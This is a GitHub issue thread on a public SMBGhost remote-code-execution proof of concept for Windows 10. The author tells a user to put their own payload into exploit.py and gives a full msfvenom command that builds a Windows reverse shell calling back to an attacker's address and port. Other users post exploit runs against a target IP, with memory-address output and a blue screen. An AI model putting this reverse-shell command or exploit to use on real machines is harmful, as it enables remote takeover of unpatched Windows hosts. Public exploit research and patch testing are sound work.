chompie1337 / SMBGhost_RCE_PoC

1.3k stars 349 forks source link

which port should I listen on my computer? #7

Open IMnewer opened 4 years ago

IMnewer commented 4 years ago

which port should I listen on my computer? default is 4444?

chompie1337 commented 4 years ago

The exploit has no knowledge of your IP, you must replace the USER_PAYLOAD portion in exploit.py with your own payload.

If you want a reverse shell, you can use msfvenom to generate one. Ex: msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.213.1 LPORT=31337 -f python

msfvenom come standards on Kali Linux which you can download from here: https://www.kali.org/downloads/

Ready made VMs can be downloaded from here: https://www.offensive-security.com/kali-linux-vm-vmware-virtualbox-image-download/

IMnewer commented 4 years ago

OK, Thranks!

dickens88 commented 4 years ago

i tried, but only got bule screen ...

my target windows is version win10 1903 (os build 18362.719)

chompie1337 commented 4 years ago

i tried, but only got bule screen ...

my target windows is version win10 1903 (os build 18362.719)

try it again, 2-3x, and if you can please report the stop code. thank you

dickens88 commented 4 years ago

@chompie1337 i turned to another win10 1903 (os build 19362.356) and tried again, this time it didn't show bule screen. but the poc shows the following information:

# python3 exploit.py -ip 192.168.134.38
[+] found low stub at phys addr 12000!
[+] PML4 at 1aa000
[+] base of HAL heap at fffff785c0000000
[+] found PML4 self-ref entry 14b
[-] failed to find HalpInterruptController!